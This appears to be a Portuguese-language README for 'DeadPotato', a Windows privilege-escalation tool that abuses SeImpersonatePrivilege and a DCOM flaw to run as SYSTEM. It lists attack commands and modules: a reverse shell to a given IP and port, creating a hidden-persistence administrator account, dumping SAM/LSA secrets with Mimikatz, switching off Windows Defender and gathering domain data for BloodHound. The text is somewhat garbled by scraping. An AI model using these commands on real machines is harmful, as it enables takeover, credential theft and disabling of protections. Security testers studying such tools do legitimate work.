C:Userslypd0> GodPotato.exe ⠀⢀⣠⣤⣤⣄⡀⠀ _ _ ⣴⣿⣿⣿⣿⣿⣿⣦ | _ _ _||_) _ _|_ _ _|_ _ ⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_) ⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0 ⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: 1.2 =- ⠈⠁⠀⠀⠀ _,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_ (*) Example Usage(s): -={ deadpotato.exe -MODULE [ARGUMENTS] }=- -> deadpotato.exe -cmd "whoami" -> deadpotato.exe -rev 192.168.10.30:9001 -> deadpotato.exe -exe paylod.exe -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1 -> deadpotato.exe -shell -> deadpotato.exe -mimi sam -> deadpotato.exe -defender off -> deadpotato.exe -sharphound (*) Available Modules: - cmd: Execute a command as NT AUTHORITYSYSTEM. - rev: Attempts to establish a reverse shell connection to the provided host - exe: Execute a program with NT AUTHORITYSYSTEM privileges (Does not support interactivity). - newadmin: Create a new administrator user on the local system. - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!) - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!) - defender: Either enables or disables Windows Defender's real-time protection. - sharphound: Attempts to collect domain data for BloodHound.
O direito SeImpersonatePrivilege
está habilitado em seu contexto? Com DeadPotato , é possível obter privilégios máximos no sistema local.
A ferramenta tentará iniciar um processo elevado em execução no contexto do usuário NT AUTHORITYSYSTEM
, abusando da falha RPCSS do DCOM no manuseio de OXIDs, permitindo acesso irrestrito à máquina para que operações críticas sejam executadas livremente.-cmd
é usado. Muitos módulos estão disponíveis para uso, como -rev IP:PORT
para gerar um shell reverso elevado, -newadmin usr:pass
para criar um novo usuário administrador local para persistência ou -mimi sam
para despejar hashes SAM.
Para usar DeadPotato, o direito SeImpersonatePrivilege deve estar habilitado no contexto atual. Para verificar isso, o comando whoami /priv
pode ser executado. Se o privilégio estiver desativado, a exploração não será possível no contexto atual.
C:Userslypd0> whoami /priv <...SNIP...> SeImpersonatePrivilege Impersonate a client after authentication Enabled <...SNIP...>
Este Projeto "DeadPotato" é uma ferramenta construída sobre o código fonte da obra-prima "GodPotato" de BeichenDream. Se você gosta deste projeto, certifique-se também de mostrar apoio ao projeto original
BeichenDream, Benjamin DELPY gentilkiwi
, BloodHound Developers.
Este projeto está licenciado sob a licença Apache 2.0. Revise o arquivo LICENSE para obter mais detalhes.